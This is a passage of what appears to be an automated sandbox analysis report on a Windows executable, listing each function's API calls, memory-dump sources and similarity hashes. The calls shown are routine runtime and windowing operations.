                                                                                  • Part of subcall function 00424D61: InitializeCriticalSection.KERNEL32(00000000,00000000,?,?,00425BD1,00000009,?,?,?,0042402B,00000001,00000074,?,00422CBF), ref: 00424D9E
                                                                                  • Part of subcall function 00424D61: EnterCriticalSection.KERNEL32(?,?,?,00425BD1,00000009,?,?,?,0042402B,00000001,00000074,?,00422CBF), ref: 00424DB9
                                                                                • GetCPInfo.KERNEL32(00000000,?,?,00000000,00000000,?,?,00422CEF), ref: 00423393
                                                                                  • Part of subcall function 00424DC2: LeaveCriticalSection.KERNEL32(?,00422FFE,00000009,?,00000009,00000000,?,00422FBE,000000E0,00422FAB,?,00424D81,00000018,00000000,?), ref: 00424DCF
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.279457763.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000002.00000002.279341258.0000000000400000.00000002.00020000.sdmp Download File
                                                                                • Associated: 00000002.00000002.279636345.0000000000433000.00000040.00020000.sdmp Download File
                                                                                • Associated: 00000002.00000002.279656850.000000000043B000.00000080.00020000.sdmp Download File
                                                                                • Associated: 00000002.00000002.279663606.000000000043C000.00000002.00020000.sdmp Download File
                                                                                • Associated: 00000002.00000002.279688703.0000000000445000.00000008.00020000.sdmp Download File
                                                                                • Associated: 00000002.00000002.279700554.000000000044B000.00000004.00020000.sdmp Download File
                                                                                • Associated: 00000002.00000002.279704091.000000000044D000.00000004.00020000.sdmp Download File
                                                                                • Associated: 00000002.00000002.279723938.0000000000450000.00000008.00020000.sdmp Download File
                                                                                Similarity
                                                                                • API ID: CriticalSection$EnterInfoInitializeLeave
                                                                                • String ID: 0D$0D$@D$@D
                                                                                • API String ID: 1866836854-4104052330
                                                                                • Opcode ID: a4d53608f017a08622ebb49fcea1e4122a5088e2762f03436997e2640748fc58
                                                                                • Instruction ID: fc1d7e93c980405bac3e57b67ed3873592f0245d513eda6a6e41e6866fa1d3db
                                                                                • Opcode Fuzzy Hash: a4d53608f017a08622ebb49fcea1e4122a5088e2762f03436997e2640748fc58
                                                                                • Instruction Fuzzy Hash: 07414C317042706EE712EF65F88136ABBB0AB0531AFA840BBD545C7292D73D8B45875D
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.279457763.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000002.00000002.279341258.0000000000400000.00000002.00020000.sdmp Download File
                                                                                • Associated: 00000002.00000002.279636345.0000000000433000.00000040.00020000.sdmp Download File
                                                                                • Associated: 00000002.00000002.279656850.000000000043B000.00000080.00020000.sdmp Download File
                                                                                • Associated: 00000002.00000002.279663606.000000000043C000.00000002.00020000.sdmp Download File
                                                                                • Associated: 00000002.00000002.279688703.0000000000445000.00000008.00020000.sdmp Download File
                                                                                • Associated: 00000002.00000002.279700554.000000000044B000.00000004.00020000.sdmp Download File
                                                                                • Associated: 00000002.00000002.279704091.000000000044D000.00000004.00020000.sdmp Download File
                                                                                • Associated: 00000002.00000002.279723938.0000000000450000.00000008.00020000.sdmp Download File
                                                                                Similarity
                                                                                • API ID: LongWindow$MessageSend
                                                                                • String ID: (
                                                                                • API String ID: 2178440468-3887548279
                                                                                • Opcode ID: aa270ea6b63d68efd3deac340b9b1f8c17e8642cde5c36c8e5b05ce105977c6f
                                                                                • Instruction ID: efc48133eafaa29aa690eb6f94b38460ff29542ec7ee47c098161262e5168938
                                                                                • Opcode Fuzzy Hash: aa270ea6b63d68efd3deac340b9b1f8c17e8642cde5c36c8e5b05ce105977c6f
                                                                                • Instruction Fuzzy Hash: 0031B0307007249FDB20AF65E885A6EBBF4FF08714F54422EE54297791DB78E804CB98
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                APIs
                                                                                • GetModuleFileNameA.KERNEL32(00000000,?,00000104,?,?), ref: 00431FFF
                                                                                  • Part of subcall function 004320EB: lstrlenA.KERNEL32(00000104,00000000,?,0043202F), ref: 00432122
                                                                                • lstrcpyA.KERNEL32(?,.HLP,?,?,00000104), ref: 004320A0
                                                                                • lstrcatA.KERNEL32(?,.INI,?,?,00000104), ref: 004320CD
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.279457763.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000002.00000002.279341258.0000000000400000.00000002.00020000.sdmp Download File
                                                                                • Associated: 00000002.00000002.279636345.0000000000433000.00000040.00020000.sdmp Download File
                                                                                • Associated: 00000002.00000002.279656850.000000000043B000.00000080.00020000.sdmp Download File
                                                                                • Associated: 00000002.00000002.279663606.000000000043C000.00000002.00020000.sdmp Download File
                                                                                • Associated: 00000002.00000002.279688703.0000000000445000.00000008.00020000.sdmp Download File
                                                                                • Associated: 00000002.00000002.279700554.000000000044B000.00000004.00020000.sdmp Download File
                                                                                • Associated: 00000002.00000002.279704091.000000000044D000.00000004.00020000.sdmp Download File
                                                                                • Associated: 00000002.00000002.279723938.0000000000450000.00000008.00020000.sdmp Download File
                                                                                Similarity
                                                                                • API ID: FileModuleNamelstrcatlstrcpylstrlen
                                                                                • String ID: .HLP$.INI
                                                                                • API String ID: 2421895198-3011182340
                                                                                • Opcode ID: 282bdad7b7a49d818df557b9434867c1323db3431d511cd53469a609442d5936
                                                                                • Instruction ID: 5c128bed24409d6a6e1a5555d9b502cf200a700464762aab5aa24b85f4135cb6
                                                                                • Opcode Fuzzy Hash: 282bdad7b7a49d818df557b9434867c1323db3431d511cd53469a609442d5936
                                                                                • Instruction Fuzzy Hash: DF3192B15007189FDB20DF71D884BC6B7FCAB08304F1049ABE299D2151DBB8AAC4CB54
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.279457763.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000002.00000002.279341258.0000000000400000.00000002.00020000.sdmp Download File
                                                                                • Associated: 00000002.00000002.279636345.0000000000433000.00000040.00020000.sdmp Download File
                                                                                • Associated: 00000002.00000002.279656850.000000000043B000.00000080.00020000.sdmp Download File
                                                                                • Associated: 00000002.00000002.279663606.000000000043C000.00000002.00020000.sdmp Download File
                                                                                • Associated: 00000002.00000002.279688703.0000000000445000.00000008.00020000.sdmp Download File
                                                                                • Associated: 00000002.00000002.279700554.000000000044B000.00000004.00020000.sdmp Download File
                                                                                • Associated: 00000002.00000002.279704091.000000000044D000.00000004.00020000.sdmp Download File
                                                                                • Associated: 00000002.00000002.279723938.0000000000450000.00000008.00020000.sdmp Download File
                                                                                Similarity
                                                                                • API ID: Window$EnabledItemLongMessageSend
                                                                                • String ID: Edit
                                                                                • API String ID: 3499652902-554135844
                                                                                • Opcode ID: 551976b4a16639f666a76ca1f35dad8b5f030ddcff40c72892ef058e11bacb1a
                                                                                • Instruction ID: 70ccf51cc99520c0ce91b1315d5aafdff5d5d713b7c6447970839701e7ff18f3
                                                                                • Opcode Fuzzy Hash: 551976b4a16639f666a76ca1f35dad8b5f030ddcff40c72892ef058e11bacb1a
                                                                                • Instruction Fuzzy Hash: B701A130300221ABEA241A21BC49F6BA764AB40F11F9C452BFD41D62E1CBACDCB5891E
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                APIs
                                                                                • BeginDeferWindowPos.USER32(00000000), ref: 00401F88
                                                                                • GetWindowRect.USER32 ref: 00401FC2
                                                                                • MapWindowPoints.USER32 ref: 00401FD7
                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.279457763.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000002.00000002.279341258.0000000000400000.00000002.00020000.sdmp Download File
                                                                                • Associated: 00000002.00000002.279636345.0000000000433000.00000040.00020000.sdmp Download File
                                                                                • Associated: 00000002.00000002.279656850.000000000043B000.00000080.00020000.sdmp Download File
                                                                                • Associated: 00000002.00000002.279663606.000000000043C000.00000002.00020000.sdmp Download File
                                                                                • Associated: 00000002.00000002.279688703.0000000000445000.00000008.00020000.sdmp Download File
                                                                                • Associated: 00000002.00000002.279700554.000000000044B000.00000004.00020000.sdmp Download File
                                                                                • Associated: 00000002.00000002.279704091.000000000044D000.00000004.00020000.sdmp Download File
                                                                                • Associated: 00000002.00000002.279723938.0000000000450000.00000008.00020000.sdmp Download File
                                                                                Similarity
                                                                                • API ID: Window$BeginDeferPointsRect
                                                                                • String ID:
                                                                                • API String ID: 736797044-0
                                                                                • Opcode ID: 22a5ff366dff5bacf8a3c163e1d90f37dbb0494996546eff1d4b22c01ecbf1fe
                                                                                • Instruction ID: c7c864fc1c73775e9896701d4901ab5e805bf85a1c3a526c572a3df08d31f576
                                                                                • Opcode Fuzzy Hash: 22a5ff366dff5bacf8a3c163e1d90f37dbb0494996546eff1d4b22c01ecbf1fe
                                                                                • Instruction Fuzzy Hash: 4E61D2B5E10219AFDB08CF98D895EEEB7B5FF88300F108159E915A7390DB74A941CFA4
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                APIs
                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.279457763.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000002.00000002.279341258.0000000000400000.00000002.00020000.sdmp Download File
                                                                                • Associated: 00000002.00000002.279636345.0000000000433000.00000040.00020000.sdmp Download File
                                                                                • Associated: 00000002.00000002.279656850.000000000043B000.00000080.00020000.sdmp Download File
                                                                                • Associated: 00000002.00000002.279663606.000000000043C000.00000002.00020000.sdmp Download File
                                                                                • Associated: 00000002.00000002.279688703.0000000000445000.00000008.00020000.sdmp Download File
                                                                                • Associated: 00000002.00000002.279700554.000000000044B000.00000004.00020000.sdmp Download File
                                                                                • Associated: 00000002.00000002.279704091.000000000044D000.00000004.00020000.sdmp Download File
                                                                                • Associated: 00000002.00000002.279723938.0000000000450000.00000008.00020000.sdmp Download File
                                                                                Similarity
                                                                                • API ID: Classlstrcat$H_prologInfoRegister
                                                                                • String ID:
                                                                                • API String ID: 106226465-0
                                                                                • Opcode ID: eed4b84bccfb19627f7a245485e70eb10700be14da6838876d155507445ffc71
                                                                                • Instruction ID: 3e604bf1dc942f87e133d720b30784e4d17acb1e6ac692f6707cea616a0a4b9d
                                                                                • Opcode Fuzzy Hash: eed4b84bccfb19627f7a245485e70eb10700be14da6838876d155507445ffc71
                                                                                • Instruction Fuzzy Hash: 59112635600258BFDB10AF659C01AEF7BB8EF09714F00955FF912A7261C3B89604CBA9
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                APIs
                                                                                • GetLastError.KERNEL32(?,00000000,004242D4,00000000,?,?,?,00422D49,?,?,00000000,00000000), ref: 00424075
                                                                                • TlsGetValue.KERNEL32(?,00000000,004242D4,00000000,?,?,?,00422D49,?,?,00000000,00000000), ref: 00424083
                                                                                • SetLastError.KERNEL32(00000000,?,00000000,004242D4,00000000,?,?,?,00422D49,?,?,00000000,00000000), ref: 004240CF
                                                                                  • Part of subcall function 00425B9B: HeapAlloc.KERNEL32(00000008,?,?,?,?,0042402B,00000001,00000074,?,00422CBF), ref: 00425BF0
                                                                                • TlsSetValue.KERNEL32(00000000,?,00000000,004242D4,00000000,?,?,?,00422D49,?,?,00000000,00000000), ref: 004240A7
                                                                                • GetCurrentThreadId.KERNEL32 ref: 004240B8
                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.279457763.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000002.00000002.279341258.0000000000400000.00000002.00020000.sdmp Download File
                                                                                • Associated: 00000002.00000002.279636345.0000000000433000.00000040.00020000.sdmp Download File
                                                                                • Associated: 00000002.00000002.279656850.000000000043B000.00000080.00020000.sdmp Download File
                                                                                • Associated: 00000002.00000002.279663606.000000000043C000.00000002.00020000.sdmp Download File
                                                                                • Associated: 00000002.00000002.279688703.0000000000445000.00000008.00020000.sdmp Download File
                                                                                • Associated: 00000002.00000002.279700554.000000000044B000.00000004.00020000.sdmp Download File
                                                                                • Associated: 00000002.00000002.279704091.000000000044D000.00000004.00020000.sdmp Download File
                                                                                • Associated: 00000002.00000002.279723938.0000000000450000.00000008.00020000.sdmp Download File
                                                                                Similarity
                                                                                • API ID: ErrorLastValue$AllocCurrentHeapThread
                                                                                • String ID:
                                                                                • API String ID: 2020098873-0
                                                                                • Opcode ID: d5741f88fa105702ab0fd0ea739f22cd9430d735240c3ca9594da3314135cd1b
                                                                                • Instruction ID: 4d51f5e9ff976c3d8aa0b33b00f6da95a91a60659217ff2ca041860551d2a9a3
                                                                                • Opcode Fuzzy Hash: d5741f88fa105702ab0fd0ea739f22cd9430d735240c3ca9594da3314135cd1b
                                                                                • Instruction Fuzzy Hash: CCF0BB35701631ABDB312F71FC0965A3B50EF81BB2750063AF641972A0CB68C841869C
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                APIs
                                                                                • TlsFree.KERNEL32(00000000,?,?,00431A8B,00000000,00000001), ref: 0043158A
                                                                                • GlobalHandle.KERNEL32(005CFE28), ref: 004315B2
                                                                                • GlobalUnlock.KERNEL32(00000000,?,?,00431A8B,00000000,00000001), ref: 004315BB
                                                                                • GlobalFree.KERNEL32 ref: 004315C2
                                                                                • DeleteCriticalSection.KERNEL32(0044DC28,?,?,00431A8B,00000000,00000001), ref: 004315CC
                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.279457763.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000002.00000002.279341258.0000000000400000.00000002.00020000.sdmp Download File
                                                                                • Associated: 00000002.00000002.279636345.0000000000433000.00000040.00020000.sdmp Download File
                                                                                • Associated: 00000002.00000002.279656850.000000000043B000.00000080.00020000.sdmp Download File
                                                                                • Associated: 00000002.00000002.279663606.000000000043C000.00000002.00020000.sdmp Download File
                                                                                • Associated: 00000002.00000002.279688703.0000000000445000.00000008.00020000.sdmp Download File
                                                                                • Associated: 00000002.00000002.279700554.000000000044B000.00000004.00020000.sdmp Download File
                                                                                • Associated: 00000002.00000002.279704091.000000000044D000.00000004.00020000.sdmp Download File
                                                                                • Associated: 00000002.00000002.279723938.0000000000450000.00000008.00020000.sdmp Download File
                                                                                Similarity
                                                                                • API ID: Global$Free$CriticalDeleteHandleSectionUnlock
                                                                                • String ID:
                                                                                • API String ID: 2159622880-0
                                                                                • Opcode ID: 315c397cf6710f5a852baad01ed5bd618a76d380d4ab566d283cddf702d200ec
                                                                                • Instruction ID: f4691cfff8999cfb573a41088b72928bc26d7a1f55660c634f100cfc85d66453
                                                                                • Opcode Fuzzy Hash: 315c397cf6710f5a852baad01ed5bd618a76d380d4ab566d283cddf702d200ec
                                                                                • Instruction Fuzzy Hash: CFF089313002006BDB219F399C0CA6B77ED9FC9722B15251AF416D3360DF78DD058A6D
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                APIs
                                                                                • GlobalLock.KERNEL32 ref: 0042ED62
                                                                                • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,?,00000020), ref: 0042EDB5
                                                                                • GlobalUnlock.KERNEL32(?), ref: 0042EE4C
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.279457763.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000002.00000002.279341258.0000000000400000.00000002.00020000.sdmp Download File
                                                                                • Associated: 00000002.00000002.279636345.0000000000433000.00000040.00020000.sdmp Download File
                                                                                • Associated: 00000002.00000002.279656850.000000000043B000.00000080.00020000.sdmp Download File
                                                                                • Associated: 00000002.00000002.279663606.000000000043C000.00000002.00020000.sdmp Download File
                                                                                • Associated: 00000002.00000002.279688703.0000000000445000.00000008.00020000.sdmp Download File
                                                                                • Associated: 00000002.00000002.279700554.000000000044B000.00000004.00020000.sdmp Download File
                                                                                • Associated: 00000002.00000002.279704091.000000000044D000.00000004.00020000.sdmp Download File
                                                                                • Associated: 00000002.00000002.279723938.0000000000450000.00000008.00020000.sdmp Download File
                                                                                Similarity
                                                                                • API ID: Global$ByteCharLockMultiUnlockWide
                                                                                • String ID: System
                                                                                • API String ID: 231414890-3470857405
                                                                                • Opcode ID: 8674a6de79c7ac022e739996734f591b597daf41b031573bcc3ed4604b2a7868
                                                                                • Instruction ID: 4adcf3ef6963ff03684ea47ed662c196df9c71d1413aca76686aaab65e2fadc4
                                                                                • Opcode Fuzzy Hash: 8674a6de79c7ac022e739996734f591b597daf41b031573bcc3ed4604b2a7868
                                                                                • Instruction Fuzzy Hash: 29412A32910226EFCF10DF65DC819EEBBB4FF04354F50816AE815AB244D739AA46CB98
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                APIs
                                                                                • GetClassNameA.USER32(?,?,00000010), ref: 00428661
                                                                                • lstrcmpA.KERNEL32(Button,?), ref: 0042867A
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.279457763.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000002.00000002.279341258.0000000000400000.00000002.00020000.sdmp Download File
                                                                                • Associated: 00000002.00000002.279636345.0000000000433000.00000040.00020000.sdmp Download File
                                                                                • Associated: 00000002.00000002.279656850.000000000043B000.00000080.00020000.sdmp Download File
                                                                                • Associated: 00000002.00000002.279663606.000000000043C000.00000002.00020000.sdmp Download File
                                                                                • Associated: 00000002.00000002.279688703.0000000000445000.00000008.00020000.sdmp Download File
                                                                                • Associated: 00000002.00000002.279700554.000000000044B000.00000004.00020000.sdmp Download File
                                                                                • Associated: 00000002.00000002.279704091.000000000044D000.00000004.00020000.sdmp Download File
                                                                                • Associated: 00000002.00000002.279723938.0000000000450000.00000008.00020000.sdmp Download File
                                                                                Similarity
                                                                                • API ID: ClassNamelstrcmp
                                                                                • String ID: Button
                                                                                • API String ID: 3770760073-1034594571
                                                                                • Opcode ID: 8c1800163102430cd96ecfbcb4d70ec9b706f00dce88a35e371eaaa8c99d34f1
                                                                                • Instruction ID: 4b3f4e57a7d0d293a09f5d8ccdaef0b1ae3ff54e9e5887e22dad0bc62e7f1556
                                                                                • Opcode Fuzzy Hash: 8c1800163102430cd96ecfbcb4d70ec9b706f00dce88a35e371eaaa8c99d34f1
                                                                                • Instruction Fuzzy Hash: 9C2127767012281FE700AB58FC45DBF339CEB85325F85453FFC15C2221EA2AD55982AA
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                APIs
                                                                                • GetMenuCheckMarkDimensions.USER32 ref: 00430913
                                                                                • CreateBitmap.GDI32(?,?,00000001,00000001,?), ref: 004309C2
                                                                                • LoadBitmapA.USER32 ref: 004309DA
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.279457763.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000002.00000002.279341258.0000000000400000.00000002.00020000.sdmp Download File
                                                                                • Associated: 00000002.00000002.279636345.0000000000433000.00000040.00020000.sdmp Download File
                                                                                • Associated: 00000002.00000002.279656850.000000000043B000.00000080.00020000.sdmp Download File
                                                                                • Associated: 00000002.00000002.279663606.000000000043C000.00000002.00020000.sdmp Download File
                                                                                • Associated: 00000002.00000002.279688703.0000000000445000.00000008.00020000.sdmp Download File
                                                                                • Associated: 00000002.00000002.279700554.000000000044B000.00000004.00020000.sdmp Download File
                                                                                • Associated: 00000002.00000002.279704091.000000000044D000.00000004.00020000.sdmp Download File
                                                                                • Associated: 00000002.00000002.279723938.0000000000450000.00000008.00020000.sdmp Download File
                                                                                Similarity
                                                                                • API ID: Bitmap$CheckCreateDimensionsLoadMarkMenu
                                                                                • String ID:
                                                                                • API String ID: 2596413745-3916222277
                                                                                • Opcode ID: dd745643b7141e934c58812f09dc6b270792f28580d610317db31495c312f8d3
                                                                                • Instruction ID: a3533d82a735d42b2dae822d5789ddc69112ffb21bb1f2af66eb5820fdf03c5c
                                                                                • Opcode Fuzzy Hash: dd745643b7141e934c58812f09dc6b270792f28580d610317db31495c312f8d3
                                                                                • Instruction Fuzzy Hash: EC213A71E00219AFEB10CF78DD95BAEBBB8EF84311F0452A6E505EB282D7749B44CB44
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                APIs
                                                                                • GetWindowLongA.USER32 ref: 0042FDF7
                                                                                • GetClassNameA.USER32(00000000,?,0000000A), ref: 0042FE12
                                                                                • lstrcmpiA.KERNEL32(?,combobox), ref: 0042FE21
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.279457763.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000002.00000002.279341258.0000000000400000.00000002.00020000.sdmp Download File
                                                                                • Associated: 00000002.00000002.279636345.0000000000433000.00000040.00020000.sdmp Download File
                                                                                • Associated: 00000002.00000002.279656850.000000000043B000.00000080.00020000.sdmp Download File
                                                                                • Associated: 00000002.00000002.279663606.000000000043C000.00000002.00020000.sdmp Download File
                                                                                • Associated: 00000002.00000002.279688703.0000000000445000.00000008.00020000.sdmp Download File
                                                                                • Associated: 00000002.00000002.279700554.000000000044B000.00000004.00020000.sdmp Download File
                                                                                • Associated: 00000002.00000002.279704091.000000000044D000.00000004.00020000.sdmp Download File
                                                                                • Associated: 00000002.00000002.279723938.0000000000450000.00000008.00020000.sdmp Download File
                                                                                Similarity
                                                                                • API ID: ClassLongNameWindowlstrcmpi
                                                                                • String ID: combobox
                                                                                • API String ID: 2054663530-2240613097
                                                                                • Opcode ID: 7208318ca68a3f5f4755e030604189664579df9a8236ce2ddd85f4ab1c1307fe
                                                                                • Instruction ID: 04ee319803db6a04d27ded42bad46c4062b8da0fb439852a21cb309efd9e796d
                                                                                • Opcode Fuzzy Hash: 7208318ca68a3f5f4755e030604189664579df9a8236ce2ddd85f4ab1c1307fe
                                                                                • Instruction Fuzzy Hash: 61E0E531614109BBCF119F70EC0AE9E3BB8AB00302F50C231B812D61A0EB74D2588688
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                APIs
                                                                                • GetPropA.USER32 ref: 00429746
                                                                                • CallWindowProcA.USER32 ref: 00429771
                                                                                  • Part of subcall function 00426C80: CallWindowProcA.USER32 ref: 00426CA6
                                                                                  • Part of subcall function 00426C80: RemovePropA.USER32 ref: 00426CBE
                                                                                  • Part of subcall function 00426C80: RemovePropA.USER32 ref: 00426CCA
                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.279457763.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000002.00000002.279341258.0000000000400000.00000002.00020000.sdmp Download File
                                                                                • Associated: 00000002.00000002.279636345.0000000000433000.00000040.00020000.sdmp Download File
                                                                                • Associated: 00000002.00000002.279656850.000000000043B000.00000080.00020000.sdmp Download File
                                                                                • Associated: 00000002.00000002.279663606.000000000043C000.00000002.00020000.sdmp Download File
                                                                                • Associated: 00000002.00000002.279688703.0000000000445000.00000008.00020000.sdmp Download File
                                                                                • Associated: 00000002.00000002.279700554.000000000044B000.00000004.00020000.sdmp Download File
                                                                                • Associated: 00000002.00000002.279704091.000000000044D000.00000004.00020000.sdmp Download File
                                                                                • Associated: 00000002.00000002.279723938.0000000000450000.00000008.00020000.sdmp Download File
                                                                                Similarity
                                                                                • API ID: Prop$CallProcRemoveWindow
                                                                                • String ID:
                                                                                • API String ID: 2276450057-0
                                                                                • Opcode ID: 86c7fc6ee46c35901c867c10044e382f601ecfd1abd8370f5c457ff39019c19e
                                                                                • Instruction ID: 6d8e189070865e50eb5a0125cec9133d6ebd97089a4d7b211e56e48425280b1a
                                                                                • Opcode Fuzzy Hash: 86c7fc6ee46c35901c867c10044e382f601ecfd1abd8370f5c457ff39019c19e
                                                                                • Instruction Fuzzy Hash: 8831F776B10220ABD610AE15FC859AFB398EFD6B35FC4052BF90453241D72DAE49826F
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                APIs
                                                                                  • Part of subcall function 004303C1: GetParent.USER32(?), ref: 004303F4
                                                                                  • Part of subcall function 004303C1: GetLastActivePopup.USER32(?), ref: 00430403
                                                                                  • Part of subcall function 004303C1: IsWindowEnabled.USER32(?), ref: 00430418
                                                                                  • Part of subcall function 004303C1: EnableWindow.USER32(?,00000000), ref: 0043042B
                                                                                • SendMessageA.USER32 ref: 0043027F
                                                                                • GetModuleFileNameA.KERNEL32(00000000,?,00000104,00000000,?,00000000), ref: 004302ED
                                                                                • MessageBoxA.USER32 ref: 004302FB
                                                                                • EnableWindow.USER32(00000000,00000001), ref: 00430317
                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.279457763.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000002.00000002.279341258.0000000000400000.00000002.00020000.sdmp Download File
                                                                                • Associated: 00000002.00000002.279636345.0000000000433000.00000040.00020000.sdmp Download File
                                                                                • Associated: 00000002.00000002.279656850.000000000043B000.00000080.00020000.sdmp Download File
                                                                                • Associated: 00000002.00000002.279663606.000000000043C000.00000002.00020000.sdmp Download File
                                                                                • Associated: 00000002.00000002.279688703.0000000000445000.00000008.00020000.sdmp Download File
                                                                                • Associated: 00000002.00000002.279700554.000000000044B000.00000004.00020000.sdmp Download File
                                                                                • Associated: 00000002.00000002.279704091.000000000044D000.00000004.00020000.sdmp Download File
                                                                                • Associated: 00000002.00000002.279723938.0000000000450000.00000008.00020000.sdmp Download File
                                                                                Similarity
                                                                                • API ID: Window$EnableMessage$ActiveEnabledFileLastModuleNameParentPopupSend
                                                                                • String ID:
                                                                                • API String ID: 1958756768-0
                                                                                • Opcode ID: 62c385102f6778a129e4fd6e660d15a9cd4b94e955f9dde623250355da779e75
                                                                                • Instruction ID: e704a840c2d638f7fab2b38e9494cffd4b89029d8ea40933ad924e25a40fe41f
                                                                                • Opcode Fuzzy Hash: 62c385102f6778a129e4fd6e660d15a9cd4b94e955f9dde623250355da779e75
                                                                                • Instruction Fuzzy Hash: A121D672900208AFDB209F95CCD9BEFB7B9FB48700F2412AAF611E7280C7789D408B54
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                APIs
                                                                                • GetVersion.KERNEL32 ref: 00422C75
                                                                                  • Part of subcall function 00424A8D: HeapCreate.KERNELBASE(00000000,00001000,00000000,00422CAD,00000001), ref: 00424A9E
                                                                                  • Part of subcall function 00424A8D: HeapDestroy.KERNEL32 ref: 00424ABC
                                                                                • GetCommandLineA.KERNEL32 ref: 00422CD5
                                                                                • GetStartupInfoA.KERNEL32(?), ref: 00422D00
                                                                                • GetModuleHandleA.KERNEL32(00000000,00000000,?,0000000A), ref: 00422D23
                                                                                  • Part of subcall function 00422D7C: ExitProcess.KERNEL32 ref: 00422D99
                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.279457763.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000002.00000002.279341258.0000000000400000.00000002.00020000.sdmp Download File
                                                                                • Associated: 00000002.00000002.279636345.0000000000433000.00000040.00020000.sdmp Download File
                                                                                • Associated: 00000002.00000002.279656850.000000000043B000.00000080.00020000.sdmp Download File
                                                                                • Associated: 00000002.00000002.279663606.000000000043C000.00000002.00020000.sdmp Download File
                                                                                • Associated: 00000002.00000002.279688703.0000000000445000.00000008.00020000.sdmp Download File
                                                                                • Associated: 00000002.00000002.279700554.000000000044B000.00000004.00020000.sdmp Download File
                                                                                • Associated: 00000002.00000002.279704091.000000000044D000.00000004.00020000.sdmp Download File
                                                                                • Associated: 00000002.00000002.279723938.0000000000450000.00000008.00020000.sdmp Download File
                                                                                Similarity
                                                                                • API ID: Heap$CommandCreateDestroyExitHandleInfoLineModuleProcessStartupVersion
                                                                                • String ID:
                                                                                • API String ID: 2057626494-0
                                                                                • Opcode ID: 5a598c80328aa6dc8baaed519336eeddf2bb376c32c240e30c956057d23bc4ac
                                                                                • Instruction ID: 14cb5e89c1199372d53d1cb2a10a980279646cf1080a39ab060e5aa405f6d556
                                                                                • Opcode Fuzzy Hash: 5a598c80328aa6dc8baaed519336eeddf2bb376c32c240e30c956057d23bc4ac
                                                                                • Instruction Fuzzy Hash: DB21E6B0A00324AEDB18AFA6BC06B6E77B8EF45714F50042FF50197291DB7C4440CB5C
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                APIs
                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.279457763.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000002.00000002.279341258.0000000000400000.00000002.00020000.sdmp Download File
                                                                                • Associated: 00000002.00000002.279636345.0000000000433000.00000040.00020000.sdmp Download File
                                                                                • Associated: 00000002.00000002.279656850.000000000043B000.00000080.00020000.sdmp Download File
                                                                                • Associated: 00000002.00000002.279663606.000000000043C000.00000002.00020000.sdmp Download File
                                                                                • Associated: 00000002.00000002.279688703.0000000000445000.00000008.00020000.sdmp Download File
                                                                                • Associated: 00000002.00000002.279700554.000000000044B000.00000004.00020000.sdmp Download File
                                                                                • Associated: 00000002.00000002.279704091.000000000044D000.00000004.00020000.sdmp Download File
                                                                                • Associated: 00000002.00000002.279723938.0000000000450000.00000008.00020000.sdmp Download File
                                                                                Similarity
                                                                                • API ID: MessagePropSend$Remove
                                                                                • String ID:
                                                                                • API String ID: 2793251306-0
